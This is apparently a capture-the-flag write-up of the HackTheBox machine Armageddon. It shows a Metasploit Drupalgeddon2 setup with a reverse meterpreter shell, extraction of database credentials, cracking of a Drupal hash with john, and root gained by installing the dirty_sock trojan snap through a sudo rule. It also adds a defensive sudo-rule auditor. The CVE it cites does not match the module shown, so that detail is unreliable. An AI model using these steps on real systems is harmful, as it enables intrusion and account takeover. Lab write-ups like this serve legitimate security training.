Hackthebox - Armageddon

Summary

Armageddon was an easy Linux machine by bertolis on HTB. The initial foothold was finding a Drupal instance; enumerating it further reveals the version, which has an unauthenticated RCE that gives us a shell. Privilege escalation was abusing `sudo snap install` (as documented on GTFOBins) to get root.

Initial Enumeration

Nmap scan:

```text
# Nmap 7.91 scan initiated Sun Mar 28 08:57:58 2021 as: nmap -sC -sV -oN nmap/armageddon 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.082s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 28 08:58:11 2021 -- 1 IP address (1 host up) scanned in 13.19 seconds
```

Let's start with port 80.

Seeing a create-user page, I tried to create a user, but we get an error.

In `robots.txt` I saw there is an entry for `CHANGELOG.txt`:

```bash
$ curl -s http://10.10.10.233/CHANGELOG.txt

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
...[snip]...
```

We now know the application version: Drupal 7.56.

Googling for "Drupal 7.56 exploit" turned up many RCE CVEs.

There is also a Metasploit module with a PoC for it.

Using CVE-2019-6339 we get RCE and a shell:

```text
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       10.10.10.233     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
```

Escalation (apache -> brucetherealadmin)

```bash
$ cat /var/www/html/sites/default/settings.php
...[snip]...
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...[snip]...
```

```bash
$ mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal > dump_table.sql
# To dump only the users table
$ mysqldump -u drupaluser -pCQHEy@9M*m23gBVj drupal users > users.sql
```

In the users dump we find the password hash for brucetherealadmin:

```text
$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
```

We can try to crack it with john:

```bash
$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
1g 0:00:00:01 DONE (2021-03-28 10:50) 0.6711g/s 155.7p/s 155.7c/s 155.7C/s tiffany..harley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

The password cracks as `booboo`.
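The `$S$` prefix john reports as "Drupal7" is a self-describing format: `$S$`, then one character giving the log2 iteration count (`D` is index 15 in the phpass alphabet, hence john's "Cost 1 (iteration count) is 32768"), then an 8-character salt, then 43 characters of phpass-style base64 from an iterated SHA-512, the whole thing cut to 55 characters. The verifier below is an added example written for this write-up, not the author's code or Drupal's own PHP; it reimplements Drupal 7's `_password_crypt()` in Python so you can check a candidate password against a hash offline. Only the hash and the cracked password come from the page; `hash_password()` and its salt generation are my additions mirroring Drupal's behaviour.

```python
# Added example (not from the original write-up): verify and create Drupal 7
# "$S$" password hashes, the scheme john labels "Drupal7".
# Layout: $S$ | itoa64 char = log2(iterations) | 8-char salt | 43 chars of
# phpass base64 over an iterated SHA-512 digest (total truncated to 55 chars).
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are cut to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# Hash copied from the write-up; john recovered the password "booboo".
PAGE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def phpass_b64(data: bytes) -> str:
    """Drupal's _password_base64_encode(): 6-bit groups, little-endian, ITOA64 alphabet."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str) -> tuple[int, str]:
    """Return (log2 iteration count, salt) from the 12-char setting prefix."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 sha512 hash")
    count_log2 = ITOA64.index(stored[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return count_log2, stored[4:12]


def drupal7_crypt(password: str, setting: str) -> str:
    """Recompute the hash of `password` under the setting string of an existing hash."""
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    h = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):  # 'D' -> 2**15 = 32768 rounds
        h = hashlib.sha512(h + pw).digest()
    return (setting[:12] + phpass_b64(h))[:HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """Constant-format check: recompute and compare with the stored hash."""
    return drupal7_crypt(password, stored) == stored


def hash_password(password: str, count_log2: int = 15) -> str:
    """Create a fresh hash like user_hash_password(): random 8-char salt, 2**count_log2 rounds."""
    salt = phpass_b64(os.urandom(6))[:8]
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


if __name__ == "__main__":
    log2, salt = parse_setting(PAGE_HASH)
    print(f"salt={salt} iterations={1 << log2}")   # matches john's cost line
    print("booboo verifies:", verify("booboo", PAGE_HASH))
```

The 32768 rounds are why john reports only about 155 candidates per second per thread on this hash: the work factor, not the SHA-512 itself, is what makes a dictionary attack slow, and a weak password like `booboo` is found in seconds regardless.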

Escalation (brucetherealadmin -> root)

Using the above credentials we log in as brucetherealadmin and get user.

Running `sudo -l` reveals:

```text
[brucetherealadmin@armageddon ~]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
```

We can run `snap install` as root without a password.

So I used the trojan snap from [dirty-sock](https://raw.githubusercontent.com/initstring/dirty_sock/master/dirty_sockv2.py), copied it to the machine, base64-decoded it, saved it as `trojan.snap` and ran:

```bash
$ sudo snap install --devmode ./trojan.snap
```

which created a new user with

```text
username: dirty_sock
password: dirty_sock
```

Using that user we get root.

Note: we can build our own trojan package with snapcraft, as shown in the blog post.
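The whole root escalation rests on one sudoers line, so it is worth having a check that flags such rules before an attacker finds them. The script below is an added example for this write-up (my code, not the author's or any project's): it parses `sudo -l` output, extracts the per-command rules, and reports rules that run as root without a password, allow a wildcard argument, or name a binary that can execute arbitrary code as the target user. The sample input is the write-up's own `sudo -l` output, trimmed; `RISKY_BINARIES` is a constructed, deliberately partial list, and the reporting format is my own.

```python
# Added example (not from the original write-up): audit `sudo -l` output for
# rules that hand out root via wildcards or code-executing binaries.
import re
from dataclasses import dataclass, field

# Trimmed copy of the write-up's `sudo -l` output (raw string: the
# secure_path line contains literal backslashes).
SAMPLE = r"""Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, env_reset,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
"""

# Constructed, partial list of binaries whose sudo entries let the caller run
# code as the target user. `snap install --devmode` runs the package's own
# install hook as root, which is what the dirty_sock trojan snap relies on.
RISKY_BINARIES = {"snap", "vim", "vi", "less", "find", "python", "python3",
                  "perl", "env", "bash", "sh"}

# "(runas) TAG: TAG: /path/cmd args" -- tags such as NOPASSWD: are optional.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


@dataclass
class SudoRule:
    runas: str
    tags: list[str]
    command: str
    findings: list[str] = field(default_factory=list)

    @property
    def nopasswd(self) -> bool:
        return "NOPASSWD" in self.tags


def parse_sudo_l(text: str) -> list[SudoRule]:
    """Collect the command rules listed after the 'User X may run ...' line."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m["tags"].split()]
            rules.append(SudoRule(m["runas"].strip(), tags, m["cmd"]))
    return rules


def audit(rules: list[SudoRule]) -> list[SudoRule]:
    """Attach findings to risky rules and return only the flagged ones."""
    flagged = []
    for r in rules:
        argv = r.command.split()
        binary = argv[0].rsplit("/", 1)[-1]
        runas_user = r.runas.split(":")[0].strip()
        if r.nopasswd and runas_user in ("root", "ALL"):
            r.findings.append("runs as root without a password")
        if any("*" in a for a in argv[1:]):
            r.findings.append("wildcard argument: caller chooses flags and paths")
        if binary in RISKY_BINARIES:
            r.findings.append(f"{binary} can execute arbitrary code as the target user")
        if r.findings:
            flagged.append(r)
    return flagged


if __name__ == "__main__":
    for r in audit(parse_sudo_l(SAMPLE)):
        print(f"({r.runas}) {' '.join(r.tags)} {r.command}")
        for f in r.findings:
            print("  -", f)
```

Run it on the output of `sudo -l` collected from each host; a rule that trips all three findings, as this one does, should be replaced with a dedicated wrapper that validates its arguments, or removed.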

Credentials

| Username | Password | Source |
| --- | --- | --- |
| brucetherealadmin | booboo | From DB dump hash |
Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/armageddon/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.